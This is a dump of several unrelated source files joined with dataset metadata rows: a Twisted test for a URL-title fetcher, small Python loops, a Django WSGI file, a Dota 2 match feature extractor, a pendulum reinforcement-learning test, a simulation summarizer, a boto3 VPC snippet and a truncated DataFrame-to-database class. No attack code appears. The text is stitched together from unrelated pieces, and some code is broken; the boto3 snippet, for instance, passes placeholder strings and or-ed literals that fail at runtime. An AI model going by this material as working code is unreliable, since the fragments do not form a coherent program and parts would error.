        self._require_url(url)
        # HEAD carries no body, mirroring real HTTP semantics.
        return defer.succeed(MockResponse("", self.headers, code=self.code))

    def collect(self, response, callback):
        callback(response.data.decode("utf-8"))
class TestMessageHandler(unittest.TestCase):
    """Drives app.MessageHandler over canned HTTP responses (via MockTreq)
    and checks which URLs produce title callbacks or logged errors."""
    def setUp(self):
        self.clock = task.Clock()
        self.hit_cache = IgnorantCache()
        self.miss_cache = IgnorantCache()
        self.encoding = "UTF-8"
        # HTML page template whose <title> is filled in per test step.
        self.template = string.Template("""<html>
        <head>
        <title>${title}</title>
        </head>
        <body>Example body</body>
        </html>""")
    def testNoUrl(self):
        message_handler = app.MessageHandler(self.clock, self.hit_cache,
                                             self.miss_cache, "foo bar",
                                             lambda x: self.fail(x),
                                             self.encoding, 255)
        d = next(iter(message_handler), None)
        self.assertIs(d, None, "Should not give any deferreds")
    def testUnsupportedScheme(self):
        message_handler = app.MessageHandler(self.clock, self.hit_cache,
                                             self.miss_cache, "gopher://foo/bar#baz",
                                             lambda x: self.fail(x),
                                             self.encoding, 255)
        d = next(iter(message_handler), None)
        self.assertIs(d, None, "Should not give any deferreds")
    def testForbidden(self):
        msg = "http://foo/bar"
        message_handler = app.MessageHandler(self.clock, self.hit_cache,
                                             self.miss_cache, msg,
                                             lambda x: self.fail(x),
                                             self.encoding, 255)
        iterator = iter(message_handler)
        # HTTP 400 must surface as a logged AppException, not a callback.
        d = self.step(iterator, msg, "foo", code=400)
        d.addCallback(self.ensureException)
    def testUnsupportedType(self):
        msg = "http://foo/bar"
        message_handler = app.MessageHandler(self.clock, self.hit_cache,
                                             self.miss_cache, msg,
                                             lambda x: self.fail(x),
                                             self.encoding, 255)
        iterator = iter(message_handler)
        d = self.step(iterator, msg, "foo",
                      headers={"content-type": ("image/png",)})
        d.addCallback(self.ensureException)
    def testBrokenTypeHeader(self):
        msg = "http://foo/bar"
        message_handler = app.MessageHandler(self.clock, self.hit_cache,
                                             self.miss_cache, msg,
                                             lambda x: self.fail(x),
                                             self.encoding, 255)
        iterator = iter(message_handler)
        # Empty tuple for content-type simulates a malformed header.
        d = self.step(iterator, msg, "foo",
                      headers={"content-type": tuple()})
        d.addCallback(self.ensureException)
    def testMissingTypeHeader(self):
        msg = "http://foo/bar"
        message_handler = app.MessageHandler(self.clock, self.hit_cache,
                                             self.miss_cache, msg,
                                             lambda x: self.fail(x),
                                             self.encoding, 255)
        iterator = iter(message_handler)
        d = self.step(iterator, msg, "foo",
                      headers={})
        d.addCallback(self.ensureException)
    def ensureException(self, e):
        # Exactly one AppException must have been logged by the handler.
        errors = self.flushLoggedErrors(app.AppException)
        self.assertEqual(len(errors), 1)
    def step(self, iterator, url, title, code=None, headers=None):
        """Serve one canned response for *url* (patching app.treq) and pull
        the next deferred from the handler."""
        if headers is None:
            headers = {"content-type": ("text/html;utf-8",)}
        self.output = "title: %s" % title
        app.treq = MockTreq(url, self.template.substitute(title=title),
                            headers=headers, code=code)
        d = next(iterator)
        title = "title: %s" % title
        d.addCallback(lambda e: self.clock.advance(2))
        return d
    def testHttpUrl(self):
        self.runSequence(["http://meep.com/foo/bar.baz.html#foo"])
    def testMultipleUrls(self):
        self.runSequence(["http://meep.com/foo/bar.baz.html#foo",
                          "http://meep.com/foo/bar.baz.html#bar"])
    def testHttpAndHttps(self):
        self.runSequence(["http://meep.com/foo/bar.baz.html#foo",
                          "https://meep.com/foo/bar.baz.html#bar"])
    def callback(self, x):
        self.assertEqual(x, self.output)
        return defer.succeed(None)
    def runSequence(self, urls):
        """Feed all *urls* as one message and step through them in order,
        expecting one title callback per URL and StopIteration at the end."""
        message_handler = app.MessageHandler(self.clock, self.hit_cache,
                                             self.miss_cache, " ".join(urls),
                                             self.callback,
                                             self.encoding, 255)
        iterator = iter(message_handler)
        d = defer.succeed(None)
        for url in urls:
            _, _, title = url.partition("#")
            # NOTE(review): the lambda closes over the loop variables late;
            # this only works because the defer.succeed chain fires each
            # callback synchronously as it is added — confirm if callbacks
            # ever become asynchronous.
            d.addCallback(lambda _:self.step(iterator, url, title))
        d.addCallback(lambda _: self.assertRaises(StopIteration, next, iterator))
| [
"seppo.yliolli@gmail.com"
] | seppo.yliolli@gmail.com |
3b0b0c756ee1df1d3643bade4613acc9c94aa35c | 43051d6ac06dc092c77af86ef8e5bcd2de3c0dd9 | /python/loop14.py | 8de558a2c7e2485efaa2804a1b8f62a571fc5a0b | [] | no_license | sAnjali12/BsicasPythonProgrammas | c3b9413615e542afccdec9c5cd9246105421f843 | cc1d4689cf7afd84c1280c94aa0072e46a4df614 | refs/heads/master | 2020-06-28T21:16:40.597495 | 2019-08-03T07:11:22 | 2019-08-03T07:11:22 | 200,344,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 62 | py | i = 0
# Fibonacci-style loop (Python 2 print syntax): prints i while it stays below
# 20, advancing (i, j) -> (j, i + j) each pass, i.e. 0 1 1 2 3 5 8 13.
# `i` is initialized to 0 above.
j = 1
c = 0
while i<20:
    print i
    c = i+j
    i = j
    j = c
| [
"anjalisen060@gmail.com"
] | anjalisen060@gmail.com |
2681bf3905a0e8f207d86b408b6412bd57e189fe | cf7b5e7eee3ce2e18d0d255d1e424bf280428d10 | /app/proto6749/wsgi.py | f046b777cf2e9243d08d55afced427e1cf60746d | [
"MIT"
] | permissive | PedramHD/proto6749 | 4e5b5d4b2156d05608e7fc92adf2a478978acfbd | 1aa2d63a098f0f3ba759a0e995f29d0c4ba2a471 | refs/heads/master | 2020-09-28T07:00:39.474061 | 2019-12-03T14:33:53 | 2019-12-03T14:33:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 395 | py | """
WSGI config for proto6749 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Select the project settings module, then expose the standard WSGI callable.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'proto6749.settings')
application = get_wsgi_application()
| [
"danielf@yes.com"
] | danielf@yes.com |
c2a2bfd82c4476cf27893bafb5ee032d122c5c9b | 67265dc35b445639a7b288b75eef8fb5aecf3778 | /not_a_virus.py | cace8f104c133f6910059423cf1af51953924ad6 | [] | no_license | zer0relm/zer0relm214 | 7a1fcf962ca5da14a96502e181283609314f68b6 | f2e7d5076df69141d7617fc6e1ba57748eab0659 | refs/heads/master | 2021-01-03T10:36:11.701521 | 2020-05-05T23:08:13 | 2020-05-05T23:08:13 | 239,891,296 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | import random
#import pyautogui
# Joke script: loop_boi is never modified inside the loop, so this prints
# "UwU" forever (intentional, going by the file's name).
loop_boi = 69
while loop_boi < 420:
    print("UwU")
| [
"zer0relm@gmail.com"
] | zer0relm@gmail.com |
820cee28dc44d3740f71f0e09127e9af4343a504 | cb44d69ab09d7515e8919198db1d58f155576775 | /dataset_gathering/5_extracting_attributes/one_by_one_match_extraction.py | daa5f3bb1f62a8132f8df4d1fbac36bad7c943dd | [] | no_license | dtoma95/dota2_mmr_estimation | 8ee5268b5d64a82a4f17e9a1ac4e541050b26460 | 44975887090f127cfb5a3df97a68be421ff9dbe2 | refs/heads/master | 2020-04-24T15:31:02.266035 | 2019-07-08T17:00:25 | 2019-07-08T17:00:25 | 172,070,895 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,677 | py | import json
import os
# Feature toggles: one-hot encode item/hero columns and include all ten
# players' stats in each CSV row when enabled.
DO_ITEMS = False
DO_HEROES = False
DO_ALL_PLAYERS = True
PATH = "../../data/tomislav"
# id -> name lookup tables, used for the one-hot column headers.
with open("heroes.json", "r") as f:
    heroes = json.load(f)
with open("items.json", "r") as f:
    items = json.load(f)
def read_data1(path):
    """Convert every player JSON dump under *path* into rows of
    one_be_one.csv — one row per player, built from that player's FIRST
    recorded match only (note the `break` below)."""
    f_write = open("one_be_one.csv", "w")
    write_header(f_write)
    for filename in os.listdir(path):
        # Skip (and log) anything that is not a JSON dump.
        if ".json" not in filename:
            print(filename)
            continue
        # Each dump stores the whole player list as a single JSON line.
        fr = open(path+"/" + filename, "r")
        stringo = fr.readline()
        d = json.loads(stringo)
        fr.close()
        for player in d:
            account_id = player["account_id"]
            # NOTE(review): recorded_games is computed but never used.
            recorded_games = len(player["match_history"])
            mmr = player["solo_mmr"]
            for match in player["match_history"]:
                line_data = extract_match_data(match, account_id, mmr)
                if line_data is not None:
                    line = ""
                    for i in line_data:
                        line += str(i)+","
                    # Trim the trailing comma before terminating the row.
                    f_write.write(line[:-1]+"\n")
                # Only the first match per player is exported ("one by one").
                break
    f_write.close()
def write_header(f_write):
    """Write the CSV header row matching the column layout produced by
    extract_match_data() under the current DO_* toggles."""
    per_player = ["gold_per_min", "xp_per_min", "kills", "deaths",
                  "assists", "last_hits", "denies", "level"]
    hero_cols = [heroes[hid] for hid in heroes.keys()] if DO_HEROES else []
    if not DO_HEROES:
        # Without one-hot heroes the raw hero id becomes a basic column.
        per_player.append("hero_id")
    item_cols = [items[iid] for iid in items.keys()] if DO_ITEMS else []
    slots = ["this_player"]
    if DO_ALL_PLAYERS:
        slots.extend(["teammate_1", "teammate_2", "teammate_3", "teammate_4",
                      "enemy_1", "enemy_2", "enemy_3", "enemy_4", "enemy_5"])
    columns = ["account_id", "match_id", "mmr", "win", "is_radiant", "duration"]
    for slot in slots:
        columns.extend(slot + "_" + col
                       for col in per_player + hero_cols + item_cols)
    f_write.write(",".join(columns) + "\n")
#account_id, mmr, win, is_radiant, duration
#gpm, xpm, denies, lh
def extract_match_data(match, player_id, mmr):
    """Build one flat feature row for `player_id` in `match`.

    Returns a list of values matching the header from write_header(), or
    None when the player cannot be found or the match roster is incomplete.
    """
    retval = []
    retval.append(player_id)
    retval.append(match["match_id"])
    retval.append(mmr)
    # Additional match fields available but currently unused:
    #"tower_status_radiant": 0,
    #"tower_status_dire": 1830,
    #"barracks_status_radiant": 0,
    #"barracks_status_dire": 63,
    #"radiant_score": 31,
    #"dire_score": 38
    # isRadient: which side the target player is on; covek ("person") is
    # that player's dict within the match roster.
    isRadient = False
    covek = None
    for p in match["players"]:
        if player_id == p["account_id"]:
            # Slots below 5 are Radiant; anything else is Dire.
            if p["player_slot"] < 5:
                isRadient = True
            else:
                isRadient = False
            covek = p
            break
    if covek is None:
        # Target player missing from the roster -- debug marker, skip row.
        print("wtf")
        return None
    # 'win' column: did the target player's side win?
    if isRadient:
        retval.append( match["radiant_win"])
    else:
        retval.append(not match["radiant_win"])
    retval.append(isRadient)
    retval.append(match["duration"])
    retval.extend(player_details(covek))
    if DO_ALL_PLAYERS:
        # my team
        # brojac ("counter") tracks how many players were emitted; the
        # target player counts as the first one.
        brojac = 1
        for p in match["players"]:
            try:
                if player_id == p["account_id"]:
                    continue
            except:
                # Presumably guards anonymous players lacking "account_id"
                # -- NOTE(review): the == comparison itself cannot raise,
                # only the key lookup can.
                pass
            if isRadient and p["player_slot"] < 5:
                retval.extend(player_details(p))
                brojac += 1
            elif not isRadient and p["player_slot"] > 5:
                retval.extend(player_details(p))
                brojac += 1
        if brojac != 5:
            # Incomplete own-team roster; logged but the row is still kept.
            print("MYTEAM", brojac, match["match_id"])
        # enemy team
        for p in match["players"]:
            try:
                if player_id == p["account_id"]:
                    continue
            except:
                pass
            if isRadient and p["player_slot"] > 5:
                retval.extend(player_details(p))
                brojac += 1
            elif not isRadient and p["player_slot"] < 5:
                retval.extend(player_details(p))
                brojac += 1
        if brojac != 10:
            # GRESKA = "error": full roster of 10 not found, drop the row.
            print("GRESKA", brojac, match["match_id"])
            return None
    return retval
def player_details(covek):
    """Collect the per-player stat columns for one player dict from a match."""
    stats = [covek[field] for field in (
        "gold_per_min", "xp_per_min", "kills", "deaths",
        "assists", "last_hits", "denies", "level")]
    # Hero encoding: one-hot vector, or the raw hero_id column.
    if DO_HEROES:
        stats.extend(heroes_one_hot(covek["hero_id"], heroes))
    else:
        stats.append(covek["hero_id"])
    # Item counts are appended only when item encoding is enabled.
    if DO_ITEMS:
        carried = [covek[slot] for slot in (
            "item_0", "item_1", "item_2", "item_3", "item_4", "item_5",
            "backpack_0", "backpack_1", "backpack_2")]
        stats.extend(items_one_hot(carried, items))
    return stats
def heroes_one_hot(hero_id, heroes):
    """One-hot encode `hero_id` over the positions of the `heroes` dict."""
    encoding = [0] * len(heroes)
    # Hero ids are not contiguous; shift the id onto its dense position.
    if hero_id < 24:
        position = hero_id - 1
    elif hero_id < 115:
        position = hero_id - 2
    else:
        position = hero_id - 6
    encoding[position] = 1
    return encoding
def items_one_hot(my_items, items):
    """Count-encode the carried item ids over the positions of the `items` dict."""
    counts = [0] * len(items)
    for item_id in my_items:
        # Id 0 means an empty inventory slot; nothing to record.
        if item_id == 0:
            continue
        # Item ids skip one value at 265, hence the shifted dense index.
        position = item_id - 1 if item_id < 265 else item_id - 2
        counts[position] += 1
    return counts
read_data1(PATH) | [
"dtoma95@gmail.com"
] | dtoma95@gmail.com |
0242461d1b3d92b2945233540096b2a542889e70 | afe0d07073fac2fe70ee63580989f936e6c44197 | /d3.2.py | 407beff430b1101c907fa8318c7c4543ee56a064 | [] | no_license | DineshBE/fjod7ofofk | c7261eec934457b8715797329904a4e3cd195c92 | 25f674de03d09aa73be729110096f4d89ca521ff | refs/heads/master | 2020-06-19T05:11:48.715813 | 2019-07-19T06:41:33 | 2019-07-19T06:41:33 | 196,575,990 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 77 | py | yz = int(input())
mylist = list(map(int,input().split()))
print(max(mylist))
| [
"noreply@github.com"
] | DineshBE.noreply@github.com |
fa8960c5b3b5dc86599a11cecec2129c42140c3e | 8d9b47358c9ff25f456b5a33511d1a1b7b99b67f | /tests/pendulum_test.py | dc45e33b5330fe690bd786e2ce10c3e87980ac34 | [] | no_license | gearsuccess/deep_rl | f84214b1b2ef00b6e8e2ebcaad4f47b5f8468f80 | 05e21eb634a2cdd64b85be8a075cfd686080b915 | refs/heads/master | 2022-11-09T19:53:14.948082 | 2020-07-02T12:42:05 | 2020-07-02T12:42:05 | 280,841,931 | 0 | 1 | null | 2020-07-19T10:26:17 | 2020-07-19T10:26:16 | null | UTF-8 | Python | false | false | 3,178 | py | import os
import gym
import argparse
import numpy as np
import torch
from networks import *
# Configurations
parser = argparse.ArgumentParser()
parser.add_argument('--algo', type=str, default='atac',
help='select an algorithm among vpg, trpo, ppo, ddpg, td3, sac, asac, tac, atac')
parser.add_argument('--load', type=str, default=None,
help='copy & paste the saved model name, and load it (ex. --load=Pendulum-v0_...)')
parser.add_argument('--render', action="store_true", default=True,
help='if you want to render, set this to True')
parser.add_argument('--test_eps', type=int, default=10000,
help='testing episode number')
parser.add_argument('--gpu_index', type=int, default=0)
args = parser.parse_args()
device = torch.device('cuda', index=args.gpu_index) if torch.cuda.is_available() else torch.device('cpu')
def main():
    """Run a trained policy on Pendulum-v0 and report average returns.

    The algorithm family (args.algo) selects which network architecture to
    build; args.load optionally restores pretrained weights from
    ./save_model/. Prints a running average every 10 episodes.
    """
    env = gym.make('Pendulum-v0')
    obs_dim = env.observation_space.shape[0]
    act_dim = env.action_space.shape[0]
    # Pick the network architecture matching the training algorithm.
    if args.algo == 'trpo' or args.algo == 'ppo':
        mlp = GaussianPolicy(obs_dim, act_dim).to(device)
    elif args.algo == 'ddpg' or args.algo == 'td3':
        mlp = MLP(obs_dim, act_dim, hidden_sizes=(128,128), output_activation=torch.tanh).to(device)
    elif args.algo == 'sac' or args.algo == 'asac' or args.algo == 'tac' or args.algo == 'atac':
        mlp = ReparamGaussianPolicy(obs_dim, act_dim, hidden_sizes=(128,128)).to(device)
    if args.load is not None:
        pretrained_model_path = os.path.join('./save_model/' + str(args.load))
        pretrained_model = torch.load(pretrained_model_path, map_location=device)
        mlp.load_state_dict(pretrained_model)
    test_sum_returns = 0.
    test_num_episodes = 0
    for episode in range(1, args.test_eps+1):
        total_reward = 0.
        obs = env.reset()
        done = False
        while not done:
            if args.render:
                env.render()
            # Policies return different tuple shapes per algorithm family;
            # in every case only the action tensor is kept.
            if args.algo == 'trpo' or args.algo == 'ppo':
                action, _, _, _ = mlp(torch.Tensor(obs).to(device))
                action = action.detach().cpu().numpy()
            elif args.algo == 'ddpg' or args.algo == 'td3':
                action = mlp(torch.Tensor(obs).to(device)).detach().cpu().numpy()
            elif args.algo == 'sac' or args.algo == 'asac' or args.algo == 'tac' or args.algo == 'atac':
                action, _, _ = mlp(torch.Tensor(obs).to(device))
                action = action.detach().cpu().numpy()
            next_obs, reward, done, _ = env.step(action)
            total_reward += reward
            obs = next_obs
        test_sum_returns += total_reward
        test_num_episodes += 1
        test_average_return = test_sum_returns / test_num_episodes if test_num_episodes > 0 else 0.0
        # Report progress every 10 episodes.
        if episode % 10 == 0:
            print('---------------------------------------')
            print('Episodes:', test_num_episodes)
            print('TestAverageReturn:', test_average_return)
            print('---------------------------------------')
if __name__ == "__main__":
main()
| [
"kid33629@gmail.com"
] | kid33629@gmail.com |
557abde5a656bdf7afc39a8cb61417386b872158 | dddea587abd91003b143c30fe1428635f133b62a | /summarize_summaries_standard.py | 207bb5f40c7c00f7329fde94be2f818891f75167 | [] | no_license | sellalab/Mutator | 085721d51c964c9c458e76e02ec5972a7d432012 | 125895b2262c263720a473f1f3b22c7565e71c33 | refs/heads/master | 2022-05-01T07:33:27.781032 | 2022-04-07T20:29:05 | 2022-04-07T20:29:05 | 236,088,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,520 | py | import numpy as np
import pickle
import argparse
import mutator_classes
from collections import defaultdict as ddict
import os
import gzip
import stationary_distribution_aug as sd
def main():
    """Parse CLI arguments, load all replicate summaries, and write out
    aggregate statistics (mean, between-population variance, and
    within-population heterozygosity) of mutator frequencies."""
    # a set of default params to use
    default_params = {'N': 2000,  # population size
                      'M': 1000,  # number of modifier loci, M
                      'h': 0.5,  # h
                      's': 0.01,  # s - together hs are the average fitness effects of mutations at selected loci
                      'phi': 1E-12,  # effect size of mutator alleles
                      'mutator_mutation_rate': 1.25E-7,  # Mutation rate at modifier sites
                      'mutation_rate': 1.25E-7,  # baseline mutation rate at selected sites, u0
                      'loci': 3E8 * 0.08,  # number of selected loci
                      'constant': True,  # is the population size constant
                      'split_gen': 0,
                      # the generation at which the ancestral population is split into europeans and africans
                      'backup_gen': 100,  # backup the population every 100 generations
                      'ignore_gen': 70,  # stop simulations this many generations from the present
                      'total_gen': 10000,  # how many total generations to simulate
                      'outpath': 'blah3',  # where do we store results
                      'NE_path': '/Users/will_milligan/PycharmProjects/MUTATOR_FINAL/MSMC_NE_dict.pickle',  # where do we get population size estimates
                      'invariable_mutator_mutation_rate': True,
                      'variable_mutator_effect': False,
                      'sampling_interval': 10}
    print(default_params)
    # # get and parse input string
    parser = argparse.ArgumentParser()
    parser.add_argument("--N", help="population_size", type=int, default=default_params['N'])
    parser.add_argument("--M", help="number of modifier loci, M", type=int, default=default_params['M'])
    parser.add_argument("--h", help="h", type=float, default=default_params['h'])
    parser.add_argument("--s", help="s", type=float, default=default_params['s'])
    parser.add_argument("--phi", help="Mutator effect size", type=float, default=default_params['phi'])
    parser.add_argument("--mutator_mutation_rate", help="Mutation rate at modifier sites", type=float, default=default_params['mutator_mutation_rate'])
    parser.add_argument("--mutation_rate", help="baseline mutation rate at selected sites, u0", type=float, default=default_params['mutation_rate'])
    parser.add_argument("--loci", help="number of selected loci", type=float, default=default_params['loci'])
    parser.add_argument("--constant", help="Is pop. size constant?", type=bool, default=default_params['constant'])
    parser.add_argument("--invariable_mutator_mutation_rate", help="Is the mutator mutation rate invariable?", type=bool,
                        default=default_params['invariable_mutator_mutation_rate'])
    parser.add_argument("--split_gen", help="What generation do we split at, None if not split", type=int, default=default_params['split_gen'])
    parser.add_argument("--total_gen", help="Total num. of generations to simulate", type=int, default=default_params['total_gen'])
    parser.add_argument("--backup_gen", help="How many generations between backing up populations ", type=int, default=default_params['backup_gen'])
    parser.add_argument("--ignore_gen", help="Stop simulations at this generations", type=int, default=default_params['ignore_gen'])
    parser.add_argument("--outpath", help="Where to store populations, should be directory (i.e., end in /)", type=str, default=default_params['outpath'])
    parser.add_argument("--NE_path", help="Where are pop. sizes stored", type=str, default=default_params['NE_path'])
    parser.add_argument("--variable_mutator_effect", help="False is mutator effect size is constant", type=bool, default=default_params['variable_mutator_effect'])
    parser.add_argument("--store_trajectories", help="Should we consolidate and store all mutator trajectories", type=bool, default=False)
    parser.add_argument("--sampling_interval", help="How often to sample mutator frequencies in units of N ",
                        type=float, default=default_params['sampling_interval'])
    args = parser.parse_args()
    # check that results directory exists
    assert os.path.exists(args.outpath)
    # get the directory where all replicates are stored
    replicate_directory = os.path.dirname(args.outpath)
    # load all summarized results
    all_results = load_all_summaries(replicate_directory=replicate_directory)
    # summary_functions
    # calculate the mean, variance between and within populations.
    # Each entry maps a statistic name to a triple of callables:
    # (simulated value from pooled results, 95% CI half-width across
    # replicates, theoretical expectation from the stationary distribution).
    summary_functions = {'mean' : (lambda a: np.nanmean(a[2]),
                                   lambda a: np.sqrt(np.nanvar(a[3])/len(a[3]))*1.96,
                                   lambda sd: sum([q*p for q,p in sd.items()])),
                         'var' : (lambda a: np.nanvar(a[2]),
                                  lambda a: np.sqrt(np.nanvar(a[4])/len(a[4]))*1.96,
                                  lambda sd: sum([q**2*p for q,p in sd.items()])-sum([q*p for q,p in sd.items()])**2),
                         'within' : (lambda a: np.nanmean(a[2]*(1-a[2])),
                                     lambda a: np.sqrt(np.nanvar(a[5])/len(a[5]))*1.96,
                                     lambda sd: sum([q*(1-q)*p for q,p in sd.items()]))}
    results_summarized = summarize_all_results(results = all_results,
                                               summary_functions = summary_functions,
                                               args = args)
    write_out(replicate_directory=replicate_directory,all_results_summarized = results_summarized)
def write_out(replicate_directory, all_results_summarized):
    """Pickle the summarized results dict into the replicate directory."""
    out_path = os.path.join(replicate_directory, 'all_results_summarized')
    with open(out_path, 'wb+') as fout:
        pickle.dump(all_results_summarized, fout)
# use the provided functions to summarize summaries
def summarize_all_results(results, summary_functions, args):
    """Apply each (simulated, error, stationary) summary triple to `results`.

    Returns a dict mapping each statistic name to a 3-tuple: the pooled
    simulated value, its error estimate, and the stationary-distribution
    expectation computed from results[-1]. Each entry is also printed.
    """
    summarized = {}
    for name, functions in summary_functions.items():
        sim_fn, err_fn, sd_fn = functions
        entry = (sim_fn(results), err_fn(results), sd_fn(results[-1]))
        summarized[name] = entry
        print(name, entry)
    return summarized
# load the summaries from simulations
def load_all_summaries(replicate_directory):
    """Load every replicate's summarized simulation results.

    Scans `replicate_directory` for sub-directories, each of which must
    contain ancestral/summarized_results.pickle holding the tuple
    (args, population, mutator_frequencies, mean, variance, within, sD).

    Returns (args, population, all_freqs, all_means, all_vars, all_within,
    sD), where all_freqs concatenates the per-replicate frequency arrays
    along axis 1, and args/population/sD come from the last replicate read
    (they are assumed identical across replicates).
    """
    all_freqs = None
    all_means = []
    all_vars = []
    all_within = []
    for v in os.listdir(replicate_directory):
        v_directory = os.path.join(replicate_directory, v)
        # Skip stray files; only replicate sub-directories are of interest.
        if not os.path.isdir(v_directory): continue
        # we only do this for simple (panmictic & constant N) simulations which are by default 'ancestral'
        with open(os.path.join(os.path.join(v_directory, 'ancestral'), 'summarized_results.pickle'), 'rb') as fin:
            (args, population, mutator_frequencies, mean, variance, within, sD) = pickle.load(fin)
        # Fixed: was `type(all_freqs)==type(None)`; `is None` is the idiom.
        if all_freqs is None:
            # First replicate seeds the frequency matrix.
            all_freqs = mutator_frequencies
        else:
            all_freqs = np.append(mutator_frequencies, all_freqs, axis=1)
        all_means.append(mean)
        all_vars.append(variance)
        all_within.append(within)
    # NOTE(review): if no replicate sub-directory exists, `args` et al. are
    # unbound and this raises NameError -- callers must pass a populated
    # directory.
    return (args, population, all_freqs, all_means, all_vars, all_within, sD)
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | sellalab.noreply@github.com |
7fb7c4d5f15747a600819c85ad9266779fdb129c | a676d918b568964d475a3ea25c79d446b1783abf | /Chap0/project/ex16.py | cbb9237d4682e1be0fb5529a2f836c5ce46caa04 | [] | no_license | AIHackerTest/SailingChen10_Py101-004 | 35d76d32e6a21c487ce8d48f974532fb38a05051 | 3c95e04f7d54529e897beec7652e089514ee6dd5 | refs/heads/master | 2021-05-15T00:32:35.407998 | 2017-09-12T08:31:02 | 2017-09-12T08:31:02 | 103,240,423 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 731 | py | # coding = utf-8
from sys import argv
script, filename = argv
print ("We're going to erase %r." % filename)
print ("If you don't want that, hit CTRL-C (^C).")
print ("If you do want that, hit RETURN.")
input("yes or no: ")
print ("Opening the file...")
target = open(filename, 'w')
print ("Truncating the file. Goodbye!")
target.truncate()
print ("Now I'm going to ask you for three lines.")
line1 = input("line 1: ")
line2 = input("line 2: ")
line3 = input("line 3: ")
print ("I'm going to write these to the file.")
target.write(line1)
target.write("\n")
target.write(line2)
target.write("\n")
target.write(line3)
target.write("\n")
print ("And finally,we close it.")
target.close()
| [
"xiaowan5219@gmail.com"
] | xiaowan5219@gmail.com |
745b14a03850f6c1021fad34879e927a63ac2e47 | 06de128f85f8c382a390381f5140b743ccf4a315 | /blog/urls.py | 71d273de9c2e21ba56103476bb0ae13a9b7aa372 | [] | no_license | tisaneza/my-first-blog | e301b34c2f19905da667cea02e0e65bf24b734e1 | 1b2561c80aed5b3e019b1923e2a8f10175bd49bd | refs/heads/master | 2020-05-27T09:24:44.801313 | 2019-05-25T13:41:39 | 2019-05-25T13:41:39 | 188,565,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | from django.urls import path
from . import views
urlpatterns =[
path("", views.post_list, name="post_list"),
]
| [
"transfer.stolp@gmail.com"
] | transfer.stolp@gmail.com |
0650f4a2cc4e43fa1e3590a8973f874af293b3fd | 96a31d98f2b24fd446f956ba2d524014942b0167 | /github-ec2/create-vpc.py | 604932ac1a2dd5f551a3b8f702e2333e5f8c73a7 | [] | no_license | Singh-Venus/Github_1 | b4a05fea221c2f67db4cfc9d9248d7d87c4d2679 | 8e859585f96f42e4e720c16554affafec030a4da | refs/heads/master | 2020-06-15T08:30:57.179268 | 2019-07-05T10:09:42 | 2019-07-05T10:09:42 | 195,248,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 339 | py | import boto3
client = boto3.client('ec2',region_name='your region', aws_access_key_id='your access key id', aws_secret_access_key='your access key')
response = client.create_vpc(
CidrBlock='string',
AmazonProvidedIpv6CidrBlock=True|False,
DryRun=True|False,
InstanceTenancy='default'|'dedicated'|'host'
)
print(response) | [
"venus.singh.1016@gmail.com"
] | venus.singh.1016@gmail.com |
c4935c15260daefa5a287c54e3f6c62cb08b8752 | 15e7a66981d776bc0cf380a12b9b52196072fcbc | /python/misc/dataFrameToDatabase/dataFrameToDatabase.py | 59f95b02645ef93d80f48dd3f5a6fd77148ddf83 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | maxklr/Geospatial-Center-Code | 21520904809a1b73c1a2dca42ead2443874d77ce | a8a1c7028d254690af788cbdd9cbdf859a422413 | refs/heads/master | 2023-07-12T07:48:24.437332 | 2021-08-24T21:57:39 | 2021-08-24T21:57:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,799 | py | import logging
import time
import pandas as pd
from pandas.errors import EmptyDataError
import sqlalchemy
from typing import Union, List
class DataFrameToDatabase:
    """Validate a pandas DataFrame (or chunked TextFileReader) and insert it
    into a SQL database table via SQLAlchemy's engine and DataFrame.to_sql.

    Construction validates both the data and the connection parameters;
    call main() (or insertData()) to perform the actual insert.
    """
    # region - Dunder methods
    """
    Config settings: dict(configName : (regex, requestMessage))
    Filepath: The path of the configuration file
    """
    def __init__(self, df:Union[pd.DataFrame, pd.io.parsers.TextFileReader],
                 dbTableName:str,
                 driver:str,
                 username:str=None,
                 password:str=None,
                 address:str=None,
                 dbName:str=None,
                 port:Union[int, str]=None,
                 query:dict={},
                 dbEcho:bool=True,
                 if_exists:str='fail',
                 index:bool=True,
                 index_label:str=None,
                 chunksize:int=None,
                 dtype:dict=None,
                 ):
        # NOTE(review): `query:dict={}` is a mutable default argument; the
        # same dict object is shared across calls -- confirm it is never
        # mutated, or change to None + per-call dict.
        #private
        self._logger = logging.getLogger('DataFrameToDatabase')
        self._logger.setLevel(logging.INFO)
        #default value updated in self._validateDataFrame
        self._isIterable = False
        #pd.DataFrame.to_sql variables
        self._index = index
        self._index_label = index_label
        self._chunksize = chunksize
        self._dtype = dtype
        self._dbTableName = dbTableName
        if if_exists not in ['fail', 'append', 'replace']:
            # NOTE(review): message says "fails" but the accepted value is
            # 'fail' -- the message text is misleading.
            raise ValueError('if_exists must be set to "fails", "replace", or "append"')
        elif if_exists == 'replace':
            self._logger.warning(f'Table "{dbTableName}" will be overwritten.')
        self._if_exists = if_exists
        #validating and categorizing it as iterable or not
        self._logger.info('Validating DataFrame...')
        if self._validateDataFrame(df):
            self._df = df
            self._logger.info('Valid DataFrame')
        #validating db params
        self._logger.info('Validating database parameters...')
        if self._validateDbParameters(driver, username, password, address, port, dbName, query):
            #sqlalchemy.create_engine parameters
            self._dbEcho = dbEcho
            self._driver = driver
            self._username = username
            self._password = password
            self._address = address
            self._port = port
            self._dbName = dbName
            self._query = query
            self._logger.info('Valid database parameters')
        # self._logger.info('Inserting data...')
        # self.insertData()
    def _validateDataFrame(self, df):
        """
        Validates that the df isn't empty and categorizes it as iterable (TextFileReader) or not iterable (DataFrame)
        """
        #if the df is a standard DataFrame
        if type(df) == pd.DataFrame:
